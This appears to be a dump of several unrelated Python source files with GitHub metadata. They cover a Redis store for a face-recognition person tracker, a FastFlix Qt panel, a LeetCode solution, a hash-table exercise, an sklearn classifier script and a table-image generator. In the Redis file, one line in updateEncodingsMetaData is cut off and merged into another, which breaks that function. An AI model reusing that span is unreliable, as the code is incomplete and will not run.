r.mset({\"PERSON_\"+str(ID)+\"_NB_TIME_MATCHED_KALMAN\":-1,\"PERSON_\"+str(ID)+\"_NB_FRAMES_PROCESSED_KALMAN\":0})\n saveKalmanFilterUpdateTime([create_time],[ID],str(camera_ID))\n logger.performance(\"aaaaaaaa\") \n if(encoding is not None): \n #r.mset({\"PERSON_\"+str(ID)+\"_NB_TIME_MATCHED\":-1,\"PERSON_\"+str(ID)+\"_NB_FRAMES_PROCESSED\":0,\"PERSON_\"+str(ID)+\"_ENC_KEYS\":json.dumps([])})\n r.mset({\"PERSON_\"+str(ID)+\"_NB_TIME_MATCHED\":-1,\"PERSON_\"+str(ID)+\"_NB_FRAMES_PROCESSED\":0,\"PERSON_\"+str(ID)+\"_ENC_KEYS\":json.dumps([]),\"PERSON_\"+str(ID)+\"_VERIFIED\":0})\n 
updateLastInsertedEncodingKey([ID],[0])\n storeEncoding([ID],[encoding],create_time,str(camera_ID))\n\n\ndef toRedis(dict_of_enc):\n \"\"\"Store given Numpy array 'a' in Redis under key 'n'\"\"\"\n for key in dict_of_enc.keys():\n h, w = dict_of_enc[key].shape\n shape = struct.pack('>II',h,w)\n\n dict_of_enc[key] = shape + dict_of_enc[key].astype(np.float32).tobytes()\n # Store encoded data in Redis\n r.mset(dict_of_enc)\n return\n\ndef fromRedis(encoded):\n \"\"\"Retrieve Numpy array from Redis key 'n'\"\"\"\n #encoded = r.get(n)\n h, w = struct.unpack('>II',encoded[:8])\n a = np.frombuffer(encoded, dtype=np.float32, offset=8).reshape(h,w)\n return a\n\ndef getLastInsertedEncodingKey(person_IDs):\n \"\"\"get the number of the last encoding inserted\n \"\"\"\n listToGet=[]\n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_LAST_ENCODING\")\n return list(map(int,r.mget(listToGet)))\n\ndef updateLastInsertedEncodingKey(person_IDs,nbs,dictToSave=None):\n \"\"\"\n \"\"\"\n if(dictToSave is None):\n dictToSave={}\n for i,person_ID in enumerate(person_IDs):\n dictToSave[\"PERSON_\"+str(person_ID)+\"_LAST_ENCODING\"]=nbs[i]\n \n r.mset(dictToSave)\n\ndef getCamIds(person_IDs):\n listToGet=[]\n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_CAM_ID\")\n \n cam_ids=list(map(lambda x:x.decode(\"utf-8\"),r.mget(listToGet)))\n \n return cam_ids\n\ndef getVerifiedIdentities(person_IDs):\n listToGet=[]\n\n for i,ID in enumerate(person_IDs):\n listToGet.append(\"PERSON_\"+str(person_IDs[i])+\"_VERIFIED\")\n \n return list(map(int,r.mget(listToGet)))\n\n\ndef storeEncoding(person_IDs,encoding,last_time_matched,CAM_ID):\n dict_to_set={}\n dict_to_set_enc={}\n new_encoding_keys_to_add=[]\n \n nbs=getLastInsertedEncodingKey(person_IDs)\n cam_ids=getCamIds(person_IDs) \n r.incrby(\"NB_ENC\",len(encoding))\n \n for i,person_ID in enumerate(person_IDs):\n nbs[i]=nbs[i]+1\n dict_to_set[\"PERSON_\"+str(person_ID)+\"_ELI_\"+str(nbs[i])]=1.0\n dict_to_set[\"PERSON_\"+str(person_ID)+\"_AGE_\"+str(nbs[i])]=0\n dict_to_set[\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED\"]=last_time_matched\n ##BE CAREFUL HERE IN CASE OF POSSIBLE DETECTION BY MULTIPLE CAMERAS AT THE BEGINING MAYBE U SHOULD REMOVE THE FIRST CONDITION\n #logger.debug(\"Condition on camera ID of the person {0}, current camera ID {1}, ID of the person {2}\".format(cam_ids[i],CAM_ID,person_ID))\n if(nbs[i]<7 and cam_ids[i]==CAM_ID):\n r.incrby(\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED\",1)\n\n new_encoding_keys_to_add.append(\"PERSON_\"+str(person_ID)+\"_ENC_\"+str(nbs[i]))\n dict_to_set_enc[\"PERSON_\"+str(person_ID)+\"_ENC_\"+str(nbs[i])]=encoding[i]\n #updateLastInsertedEncodingKey(person_ID,nb+1)\n \n toRedis(dict_to_set_enc)\n store_new_encoding_key(person_IDs,new_encoding_keys_to_add,nbs)\n r.mset(dict_to_set)\n\n\ndef getIdentitySpecificData(person_IDs):\n keys_to_get=[]\n for person_ID in person_IDs:\n keys_to_get+=[\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED\",\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED\",\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED\"]\n #logger.debug(time.time(),\"keys_to_get\",keys_to_get)\n data=list(map(float,r.mget(keys_to_get)))\n data=[{\"last_time_matched\":data[3*x],\"nb_times_matched\":data[3*x+1],\"nb_frames_processed\":data[3*x+2]} for x in range(len(person_IDs))] \n \n return data\n\n\ndef getAllEncodings(person_IDs,CAM_ID):\n \"\"\"\n \"\"\"\n enc=[]\n IDS=[]\n\n new_enc_keys=get_encoding_keys(person_IDs)\n \n cam_ids=getCamIds(person_IDs)\n 
for i,person_ID in enumerate(person_IDs):\n frames_processed=int(r.get(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED\"))\n if(frames_processed<6 and CAM_ID==cam_ids[i]):\n r.incrby(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED\",1)\n\n\n IDS+=len(new_enc_keys[i])*[person_ID]\n\n \n enc_keys=functools.reduce(lambda x,y:x+y,new_enc_keys) \n start= time.time()\n enc=r.mget(enc_keys)\n enc=list(map(lambda x: fromRedis(x).reshape(-1),enc))\n finish=time.time()\n logger.performance(\"time inside get allencodings: {} - nb_retrieved_encodings= {})\".format(finish-start,len(enc_keys)))\n logger.debug(\"number_of_encodings: {}\".format(len(enc)))\n return enc_keys,enc,IDS\n\n\ndef updateEncodingsMetaData(enc_eli,update_eli,enc_age,min_e=0.01):\n \n #increase age for some encodings at once using mset and mget\n nb_eli=len(enc_eli)\n nb_age=len(enc_age)\n updateEli=nb_eli>0\n updateAge=nb_age>0\n\n enc_age=[x.replace(\"ENC\",\"AGE\") for x in enc_age ]\n enc_eli_new=[x.replace(\"ENC\",\"ELI\") for x in enc_eli ]\n start=time.time() \n data=r.mget(enc_age+enc_eli_new)\n finish=time.time()\n logger.performance(\"timemGet:{}, nb_enc_keys_age_eli={}\".format(finish-start,nb_age+nb_eli))\n age=data[:nb_age]\n eli=data[nb_age:]\n #eli=r.mget(enc_eli_new)\n \n \n #age=r.mget(enc_age)\n \n \n dict_age_eli={}\n for i,k_age in enumerate(enc_age):\n dict_age_eli[k_age]=int(age[i])+1\n \n\n \n \n for i,k_eli in enumerate(enc_eli_new):\n dict_age_eli[k_eli]=np.float32(eli[i])*update_eli[i]\n dict_age_eli[k_eli.replace(\"ELI\",\"AGE\")]=0\n\n start=time.time()\n if(updateEli or updateAge):\n r.mset(dict_age_eli)\n finish=time.time()\n \n logger.performance(\"timeSET: {}\".format(finish-start))\n enc_to_del=itertools.compress(enc_eli,np.array(list(map(float,eli)))=3):\n r.set(\"PERSON_\"+str(person_IDs[i])+\"_VERIFIED\",1)\n pass\n \n elif(currentTime-last_time_matched>max_age):\n logger.debug('Removing identity age={}, ID= {}'.format(currentTime-np.float64(r.get(\"PERSON_\"+str(person_IDs[i])+\"_LAST_TIME_MATCHED\")),person_IDs[i]))\n id_to_del.append(person_IDs[i])\n\n if(len(id_to_del)!=0): \n removeIdentity(id_to_del,person_IDs,INFORMATION_TO_USE)\n if(\"FACE_RECOGNITION\" in INFORMATION_TO_USE):\n control_number_of_encodings_in_redis(max_nb_enc=5000,INFORMATION_TO_USE=INFORMATION_TO_USE)\n\ndef removeIdentity(person_IDs,all_ids=None,INFORMATION_TO_USE=[\"TEMPORAL\",\"FACE_RECOGNITION\"]):\n \n if(all_ids is None):\n all_ids=get_all_ids()\n logger.debug(\"removing encodings for newly inserted {}\".format(person_IDs))\n else:\n logger.debug(\"removing encodings for old inserted {}\".format(person_IDs))\n \n\n if(\"FACE_RECOGNITION\" in INFORMATION_TO_USE): \n enc_keys=get_encoding_keys(person_IDs)\n for i,identity_keys in enumerate(enc_keys):\n \n #r.decrby(\"NB_ENC\",len(identity_keys))\n for key in identity_keys:\n # delete the key\n r.delete(key)\n r.delete(key.replace(\"ENC\",\"AGE\"))\n r.delete(key.replace(\"ENC\",\"ELI\"))\n\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_LAST_TIME_MATCHED\")\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_NB_TIME_MATCHED\")\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_LAST_ENCODING\")\n r.delete(\"PERSON_\"+str(person_IDs[i])+\"_ENC_KEYS\")\n if(\"TEMPORAL\" in INFORMATION_TO_USE): \n for i,person_ID in enumerate(person_IDs):\n \n r.delete(\"PERSON_\"+str(person_ID)+\"_LAST_POSITION\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_LAST_UPDATE_KALMAN\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_NB_FRAMES_PROCESSED_KALMAN\") \n 
r.delete(\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED_KALMAN\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED_KALMAN\")\n r.delete(\"PERSON_\"+str(person_ID)+\"_KALMAN\") \n \n for person_ID in person_IDs:\n all_ids.remove(person_ID)\n \n \"\"\"\n enc_key_to_del=[]\n for person_ID in person_IDs:\n enc_keys=get_encoding_keys(person_ID)\n enc_key_to_del+=enc_keys\n for key in enc_keys:\n # delete the key\n enc_key_to_del+=[key.replace(\"ENC\",\"AGE\"),key.replace(\"ENC\",\"ELI\")]\n\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_LAST_TIME_MATCHED\"]\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_NB_TIME_MATCHED\"]\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_LAST_ENCODING\"]\n enc_key_to_del+=[\"PERSON_\"+str(person_ID)+\"_ENC_KEYS\"]\n r.delete(enc_key_to_del)\n all_ids.remove(person_ID)\n \"\"\"\n r.set(\"ALL_PERSON_IDS\",json.dumps(all_ids))\n\ndef removeEncoding(encoding_key,INFORMATION_TO_USE=[\"FACE_RECOGNITION\"]):\n \"\"\"Delete one encoding and all of its metadata (age, eligibility, key registry) from Redis\n \"\"\" \n \n logger.debug(f'removing encoding {encoding_key}')\n #nb=encoding_key.split('_')[-1]\n #delete corresponding age of the encoding from redis\n r.delete(encoding_key.replace(\"ENC\",\"AGE\"))\n #logger.debug(encoding_key) \n ############# BE CAREFUL: potential bug later if a store or camera ID is added to the key format\n remove_encoding_key(int(encoding_key.split(\"_\")[1]),encoding_key,INFORMATION_TO_USE)\n #delete corresponding eligibility of the encoding from redis\n r.delete(encoding_key.replace(\"ENC\",\"ELI\"))\n \n r.decrby(\"NB_ENC\",1)\n #delete encoding from redis\n r.delete(encoding_key)\n \n\n\n","repo_name":"appstud/appstud-glens-backend","sub_path":"glens/worker/tracking-worker/interfaceToRedis.py","file_name":"interfaceToRedis.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25433864406","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport math\nfrom pathlib import Path\n\nimport reusables\nfrom qtpy import QtCore, QtGui, QtWidgets\n\n\nclass Loop(QtWidgets.QGroupBox):\n def __init__(self, parent, condition, commands, number, name=\"\"):\n super(Loop, self).__init__(parent)\n layout = QtWidgets.QVBoxLayout()\n layout.addWidget(QtWidgets.QLabel(f\"Loop: {name}\"))\n self.condition = condition\n self.number = number\n self.setStyleSheet(\"QGroupBox{padding-top:15px; margin-top:-18px}\")\n\n for index, item in enumerate(commands, 1):\n new_item = Command(parent, item.command, index, item.name)\n layout.addWidget(new_item)\n self.setLayout(layout)\n\n\nclass Command(QtWidgets.QTabWidget):\n def __init__(self, parent, command, number, name=\"\", enabled=True):\n super(Command, self).__init__(parent)\n self.command = command\n self.widget = QtWidgets.QTextBrowser()\n self.widget.setReadOnly(True)\n self.widget.setText(command)\n self.widget.setDisabled(not enabled)\n font_height = QtGui.QFontMetrics(self.widget.document().defaultFont()).height()\n lines = math.ceil(len(command) / 200)\n self.setMinimumHeight(int(font_height + ((lines + 2) * (font_height * 1.25))))\n\n grid = QtWidgets.QGridLayout()\n grid.addWidget(QtWidgets.QLabel(f\"Command {number}\" if not name else name), 0, 0, 1, 2)\n grid.addWidget(self.widget, 1, 0, 1, 2)\n self.setLayout(grid)\n\n\nclass CommandList(QtWidgets.QWidget):\n def __init__(self, parent):\n super(CommandList, self).__init__(parent)\n self.video_options = parent\n\n layout = QtWidgets.QGridLayout()\n\n top_row = QtWidgets.QHBoxLayout()\n 
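# header row: caption label on the left; the stretch added below pushes the copy/save buttons to the right\n 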
top_row.addWidget(QtWidgets.QLabel(\"Commands to execute\"))\n\n copy_commands_button = QtWidgets.QPushButton(\n self.style().standardIcon(QtWidgets.QStyle.SP_ToolBarVerticalExtensionButton), \"Copy Commands\"\n )\n copy_commands_button.setToolTip(\"Copy all commands to the clipboard\")\n copy_commands_button.clicked.connect(lambda: self.copy_commands_to_clipboard())\n\n save_commands_button = QtWidgets.QPushButton(\n self.style().standardIcon(QtWidgets.QStyle.SP_DialogSaveButton), \"Save Commands\"\n )\n save_commands_button.setToolTip(\"Save commands to file\")\n save_commands_button.clicked.connect(lambda: self.save_commands_to_file())\n\n top_row.addStretch()\n top_row.addWidget(copy_commands_button)\n top_row.addWidget(save_commands_button)\n\n layout.addLayout(top_row, 0, 0)\n\n self.inner_widget = QtWidgets.QWidget()\n\n self.scroll_area = QtWidgets.QScrollArea(self)\n self.scroll_area.setMinimumHeight(200)\n\n layout.addWidget(self.scroll_area)\n self.commands = []\n self.setLayout(layout)\n\n def _prep_commands(self):\n return f\"\\r\\n\".join(self.commands) if reusables.win_based else f\"\\n\".join(self.commands)\n\n def copy_commands_to_clipboard(self):\n cmds = self._prep_commands()\n self.video_options.main.container.app.clipboard().setText(cmds)\n\n @reusables.log_exception(\"fastflix\", show_traceback=False)\n def save_commands_to_file(self):\n ext = \".bat\" if reusables.win_based else \".sh\"\n filename = QtWidgets.QFileDialog.getSaveFileName(\n self, caption=\"Save Video As\", directory=str(Path(\"~\").expanduser()), filter=f\"Save File (*{ext})\"\n )\n if filename and filename[0]:\n Path(filename[0]).write_text(self._prep_commands())\n\n def update_commands(self, commands):\n if not commands:\n return\n self.inner_widget = QtWidgets.QWidget()\n sp = QtWidgets.QSizePolicy()\n sp.setHorizontalPolicy(QtWidgets.QSizePolicy.Policy.Maximum)\n self.inner_widget.setSizePolicy(sp)\n layout = QtWidgets.QVBoxLayout()\n layout.setSpacing(5)\n self.commands = []\n for index, item in enumerate(commands, 1):\n if item.item == \"command\":\n new_item = Command(self.scroll_area, item.command, index, name=item.name)\n self.commands.append(item.command)\n layout.addWidget(new_item)\n elif item.item == \"loop\":\n new_item = Loop(self.scroll_area, item.condition, item.commands, index, name=item.name)\n layout.addWidget(new_item)\n layout.addStretch()\n self.inner_widget.setLayout(layout)\n self.scroll_area.setWidget(self.inner_widget)\n self.scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.inner_widget.setFixedWidth(self.scroll_area.width() - 3)\n\n def resizeEvent(self, event: QtGui.QResizeEvent):\n self.inner_widget.setFixedWidth(self.scroll_area.width() - 3)\n return super(CommandList, self).resizeEvent(event)\n","repo_name":"buckeytuker/FastFlix","sub_path":"fastflix/widgets/panels/command_panel.py","file_name":"command_panel.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18204333292","text":"class Solution:\n def majorityElement(self, nums: List[int]) -> List[int]:\n ans1 = 0\n ans2 = 1\n count1 = 0\n count2 = 0\n\n for num in nums:\n if num == ans1:\n count1 += 1\n elif num == ans2:\n count2 += 1\n elif count1 == 0:\n ans1 = num\n count1 = 1\n elif count2 == 0:\n ans2 = num\n count2 = 1\n else:\n count1 -= 1\n count2 -= 1\n\n return [ans for ans in (ans1, ans2) if nums.count(ans) > len(nums) // 3]\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0229. 
Majority Element II/0229.py","file_name":"0229.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"40979850531","text":"import LinkedList\n\nslot = [[]] * 100 #100 empty slots (every slot is reassigned on store, so the list aliasing from [[]] * 100 is harmless here)\n\nwhile True:\n e_input = input(\"input mode (1:store 2:search 3:show_hash_table 4:end) : \")\n if (e_input.isdigit() and 0 <= int(e_input) <= 5):\n mode = int(e_input)\n if(mode ==1): #store mode\n while(True):\n e_student_id = input(\"enter student ID (key) : \")\n if (e_student_id.isdigit()):\n student_id = int(e_student_id)\n student_name = input(\"enter student name (value) : \")\n student = [student_id,student_name] #build a list from the student's id and name\n hash_key = LinkedList.hash_function(student_id)\n slot[hash_key] = LinkedList.store(slot,hash_key,student) #store the data in the slot for the computed hash key\n break\n else: #invalid input\n print(\"wrong input. Please re-input\")\n\n elif(mode ==2): #search mode\n while(True):\n e_find_id = input(\"enter ID that you find : \")\n if(e_find_id.isdigit()):\n find_id = int(e_find_id)\n hash_key = LinkedList.hash_function(find_id)\n LinkedList.search(slot,hash_key,find_id) #look up the data by hash key\n break\n else: #invalid input\n print(\"wrong input. Please re-input\")\n\n elif(mode ==3): #show_hash_table\n print(\"show hash table\")\n for i in range(0,100):\n print(slot[i])\n else: #exit\n break\n\n","repo_name":"masiro97/AILAB","sub_path":"Lab/lab02/hw01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71190268533","text":"# Greg Guyles\r\n# Final Project: Text Classification\r\n# Machine Learning\r\n# CU Boulder\r\n# 04/28/2014\r\n\r\nfrom multiprocessing import Process\r\nimport os\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.datasets import load_files\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn import metrics\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom kaggle_test import metrics_est, train_full\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.feature_selection import SelectKBest, chi2\r\nfrom os.path import isfile\r\nimport sys\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # import data\r\n subset = sys.argv[1]\r\n if(subset == '-full'):\r\n movie_reviews_data_folder = \"/home/gregor/ipyServer/data/movie_review/train\"\r\n movie_reviews_test_data_folder = \"/home/gregor/ipyServer/data/movie_review/test\"\r\n else:\r\n movie_reviews_data_folder = \"/home/gregor/ipyServer/data/movie_review/train_sub\"\r\n movie_reviews_test_data_folder = \"/home/gregor/ipyServer/data/movie_review/test_sub\"\r\n\r\n dataset = load_files(movie_reviews_data_folder, shuffle=False)\r\n test_data = load_files(movie_reviews_test_data_folder, shuffle=False)\r\n print(len(test_data))\r\n print(\"n_samples: %d\\\\n\" % len(dataset.data))\r\n\r\n # Build vectorizer\r\n vectorizer = TfidfVectorizer(sublinear_tf=False, max_df=0.1,\r\n ngram_range=(1,2))\r\n\r\n text_clf = ExtraTreesClassifier(max_depth=1024, min_samples_leaf=8,\r\n min_samples_split=16)\r\n\r\n reduceParams = 80 * 1000\r\n\r\n kaggle_test_out = '/home/gregor/ipyServer/movie_review/output/kaggle_test_04_ExTrees.csv'\r\n\r\n\r\n###############################################################################\r\n\r\n if isfile(kaggle_test_out):\r\n 
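# avoid clobbering an existing results file by writing to a '.out'-suffixed name instead\r\n 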
kaggle_test_out = kaggle_test_out + '.out'\r\n\r\n outfile_kaggle = open(kaggle_test_out, 'w+')\r\n outfile_kaggle.write('Id,Prediction\\\\n')\r\n\r\n # train on the entire set for the kaggle test\r\n X_train = vectorizer.fit_transform(dataset.data)\r\n X_test = vectorizer.transform(test_data.data)\r\n print(\"Org. shape kaggle test: \" + str(X_train.get_shape) + '\\\\n')\r\n\r\n if(subset == '-full'):\r\n kbest = reduceParams\r\n else:\r\n kbest = 'all'\r\n ch2 = SelectKBest(chi2, k=kbest)\r\n X_train = ch2.fit_transform(X_train, dataset.target)\r\n X_test = ch2.transform(X_test)\r\n print(\"Reduced Shape kaggle test: \" + str(X_train.get_shape) + '\\\\n')\r\n\r\n text_clf.fit(X_train.toarray(), dataset.target)\r\n\r\n # predict the outcome on the test set and store it in target_predicted\r\n target_predicted = text_clf.predict(X_test.toarray())\r\n\r\n for i in range(len(target_predicted)):\r\n outfile_kaggle.write(str(i + 1) + ',' + str(target_predicted[i]) + '\\\\n')\r\n\r\n outfile_kaggle.close()\r\n print('Test Completed')","repo_name":"gregguyles/CU-MachineLearning","sub_path":"finalProject/run_extree4.py","file_name":"run_extree4.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71643503092","text":"import random\n\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageFont, ImageDraw, ImageColor\n\n\ndef show_img(img):\n cv2.imshow('name', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\nclass Line(object):\n def __init__(self, line_thickness=0, type=1):\n assert line_thickness % (type + 1) == 0\n self.line_thichness = line_thickness\n self.type = type # 0 = hidden, n = n stripes\n\n def set_invisible(self):\n self.type = 0\n\n\nclass Row(object):\n def __init__(self, height, margin_top, margin_bottom, index, line_top: Line, line_bottom: Line):\n self.height = height\n self.index = index\n self.margin_top = margin_top\n self.margin_bottom = margin_bottom\n self.line_top = line_top\n self.line_bottom = line_bottom\n\n def get_height(self):\n return self.height + self.line_top.line_thichness + self.line_bottom.line_thichness\n\n\nclass Col(object):\n def __init__(self, width, margin_left, margin_right, index, line_left: Line, line_right: Line):\n self.width = width\n self.index = index\n self.margin_left = margin_left\n self.margin_right = margin_right\n self.line_left = line_left\n self.line_right = line_right\n\n def get_width(self):\n return self.width + self.line_left.line_thichness + self.line_right.line_thichness\n\n\nclass Cell(object):\n\n def __init__(self, col: Col, row: Row, text: str, font: str, align: str, size: int, cell_id: int):\n self.col = col\n self.row = row\n self.text = text\n self.cell_id = cell_id\n self.font = font\n self.align = align\n self.size = size\n\n\nclass Table(object):\n def __init__(self, widths: list = [0.6, 0.2, 0.2], table_widths=1000, table_height=500,\n margin_left=10, margin_right=10, margin_top=5, margin_bottom=1):\n self.width_each_cell = list(map(lambda x: int(table_widths * x), widths))\n self.size = map_pixel_to_size(int(41 * table_widths / 1500))\n self.n_rows = table_height // Row(height=int(41 * table_widths / 1500), margin_top=margin_top,\n margin_bottom=margin_bottom,\n index=-1, line_top=Line(2, 1), line_bottom=Line(6, 2)).get_height()\n self.n_cols = len(widths)\n self.cols = []\n self.rows = []\n self.cells = [[] for _ in range(self.n_rows)]\n self.fonts = ['/home/andn/PycharmProjects/table_detection/font/times.ttf',\n 
'/home/andn/PycharmProjects/table_detection/font/timesbd.ttf',\n '/home/andn/PycharmProjects/table_detection/font/timesi.ttf',\n '/home/andn/PycharmProjects/table_detection/font/timesbi.ttf']\n\n # <------------------ generate text in table --------------------->\n # first row\n text = [[''] * self.n_cols for _ in range(self.n_rows)]\n for i in range(1, self.n_cols):\n text[0][i] = generate_date_data()\n # rows 2 to n-1\n for i in range(1, self.n_rows - 1):\n if random.random() < 0.2:\n continue\n text[i][0] = generate_string(random.randint(3, 10))\n for j in range(1, self.n_cols):\n if random.random() < 0.2:\n continue\n text[i][j] = generate_tien(random.randint(7, 12))\n # last row\n text[self.n_rows - 1][0] = \"Cộng\"\n for j in range(1, self.n_cols):\n text[self.n_rows - 1][j] = generate_tien(random.randint(7, 12))\n # <------------------ \\\\generate text in table --------------------->\n # <------------------ compute height each cell --------------------->\n image_font = ImageFont.truetype(font=self.fonts[1], size=self.size)\n a_t = []\n for t in text:\n a_t += t\n _t = ' '.join(a_t)\n text_height = max([image_font.getsize(w)[1] for w in _t.split()])\n text_height += margin_top + margin_bottom\n self.height_each_cell = [text_height] * self.n_rows\n # <------------------ \\\\compute height each cell --------------------->\n #\n for i, w in enumerate(self.width_each_cell[:-1]):\n self.cols.append(Col(width=w, margin_left=margin_left, margin_right=margin_right,\n index=i, line_left=Line(2, 1), line_right=Line(0, 0)))\n self.cols.append(Col(width=self.width_each_cell[-1], margin_left=margin_left, margin_right=margin_right,\n index=len(self.width_each_cell), line_left=Line(2, 1), line_right=Line(2, 1)))\n\n for i, h in enumerate(self.height_each_cell[:-1]):\n self.rows.append(Row(height=h, margin_top=margin_top, margin_bottom=margin_bottom,\n index=i, line_top=Line(2, 1), line_bottom=Line(0, 0)))\n self.rows.append(Row(height=self.height_each_cell[-1], margin_top=margin_top, margin_bottom=margin_bottom,\n index=len(self.height_each_cell), line_top=Line(2, 1), line_bottom=Line(6, 2)))\n\n self.table_height = sum([r.get_height() for r in self.rows])\n self.table_width = sum([c.get_width() for c in self.cols])\n\n for i, r in enumerate(self.rows):\n for j, c in enumerate(self.cols):\n if i == 0 or i == self.n_rows - 1:\n self.cells[i].append(\n Cell(col=c, row=r, text=text[i][j], cell_id=j, font=self.fonts[1], align='left',\n size=self.size))\n else:\n self.cells[i].append(\n Cell(col=c, row=r, text=text[i][j], cell_id=j, font=self.fonts[0], align='left',\n size=self.size))\n\n for i in range(self.n_rows):\n for j in range(self.n_cols):\n if j != 0:\n self.cells[i][j].align = 'right'\n\n def get_col_start(self, index):\n return sum([c.get_width() for c in self.cols[:index]])\n\n def get_row_start(self, index):\n return sum([r.get_height() for r in self.rows[:index]])\n\n def draw(self, background_color=255):\n img = np.zeros((self.table_height, self.table_width, 3), dtype=np.uint8)\n img[:, :] = background_color\n for i in range(self.n_rows):\n if i != 1 and i != self.n_rows - 1:\n continue\n for j in range(self.n_cols):\n if i == self.n_rows - 1 and j != 0:\n img = self.show_cell_by_xy(img, i, j, left=False, right=False, top=True, bottom=True,\n margin_left=True, margin_right=True)\n elif i == self.n_rows - 1 and j == 0:\n continue\n else:\n img = self.show_cell_by_xy(img, i, j, left=False, right=False, top=True, bottom=True)\n\n for i_r, row in enumerate(self.rows):\n for i_c, col in 
enumerate(self.cols):\n img = self.draw_text_cell_by_xy(img, i_r, i_c)\n return img\n\n def draw_line(self, line: Line, img, xmin, xmax, ymin, ymax, orient='vertical'):\n assert orient in ['vertical', 'horizontal']\n if line.type == 0:\n return img\n line_thichness = line.line_thichness // (2 * line.type - 1)\n for i in range(2 * line.type - 1):\n if i % 2 == 0:\n if orient == 'horizontal':\n start = xmin + i * line_thichness\n img[start:start + line_thichness, ymin:ymax, :] = 0\n else:\n start = ymin + i * line_thichness\n img[xmin:xmax, start:start + line_thichness, :] = 0\n return img\n\n def show_cell_by_xy(self, img, x: int, y: int, left=False, right=False, top=False, bottom=False,\n margin_left=False, margin_right=False, margin_top=False, margin_bottom=False):\n xmin = self.get_row_start(x) if not margin_top else self.get_row_start(x) + self.rows[x].margin_top\n xmax = xmin + self.rows[x].get_height() if not margin_bottom else xmin + self.rows[x].get_height() \\\n - self.rows[x].margin_bottom\n ymin = self.get_col_start(y) if not margin_left else self.get_col_start(y) + self.cols[y].margin_left\n ymax = ymin + self.cols[y].get_width() if not margin_right else self.get_col_start(y) + self.cols[y].get_width() \\\n - self.cols[y].margin_right\n\n if left:\n img = self.draw_line(line=self.cols[y].line_left, img=img, orient=\"vertical\",\n xmin=xmin,\n xmax=xmax,\n ymin=ymin,\n ymax=ymin + self.cols[y].line_left.line_thichness)\n if right:\n img = self.draw_line(line=self.cols[y].line_right, img=img, orient=\"vertical\",\n xmin=xmin,\n xmax=xmax,\n ymin=ymax - self.cols[y].line_right.line_thichness,\n ymax=ymax)\n if top:\n img = self.draw_line(line=self.rows[x].line_top, img=img, orient=\"horizontal\",\n xmin=xmin,\n xmax=xmin + self.rows[x].line_top.line_thichness,\n ymin=ymin,\n ymax=ymax)\n if bottom:\n img = self.draw_line(line=self.rows[x].line_bottom, img=img, orient=\"horizontal\",\n xmin=xmax - self.rows[x].line_bottom.line_thichness,\n xmax=xmax,\n ymin=ymin,\n ymax=ymax)\n return img\n\n def draw_text_cell_by_xy(self, img, x: int, y: int):\n xmin, ymin, xmax, ymax = self.get_bounding_box_by_xy(x, y)\n img = draw_text(text=self.cells[x][y].text, font=self.cells[x][y].font, align=self.cells[x][y].align,\n size=self.cells[x][y].size,\n xmin=ymin,\n ymin=xmin,\n xmax=ymax, ymax=xmax, img=img, text_color='#000000,#282828')\n return img\n\n def get_bounding_box_by_xy(self, x, y):\n # row\n xmin = self.get_row_start(x) + self.rows[x].line_top.line_thichness + self.rows[x].margin_top\n xmax = self.get_row_start(x) + self.rows[x].get_height() \\\n - self.rows[x].line_bottom.line_thichness - self.rows[x].margin_bottom\n # col\n ymin = self.get_col_start(y) + self.cols[y].line_left.line_thichness + self.cols[y].margin_left\n ymax = self.get_col_start(y) + self.cols[y].get_width() \\\n - self.cols[y].line_right.line_thichness - self.cols[y].margin_right\n return xmin, ymin, xmax, ymax\n\n\ndef draw_text(text, font, align, size, xmin, ymin, xmax, ymax, img, text_color='#000000,#282828'):\n assert align in ['left', 'right', 'center', 'justify']\n if type(img) == np.ndarray:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img) # BGR\n\n image_font = ImageFont.truetype(font=font, size=size)\n words = text.split(\" \")\n space_width = image_font.getsize(\" \")[0] * 1\n space_height = 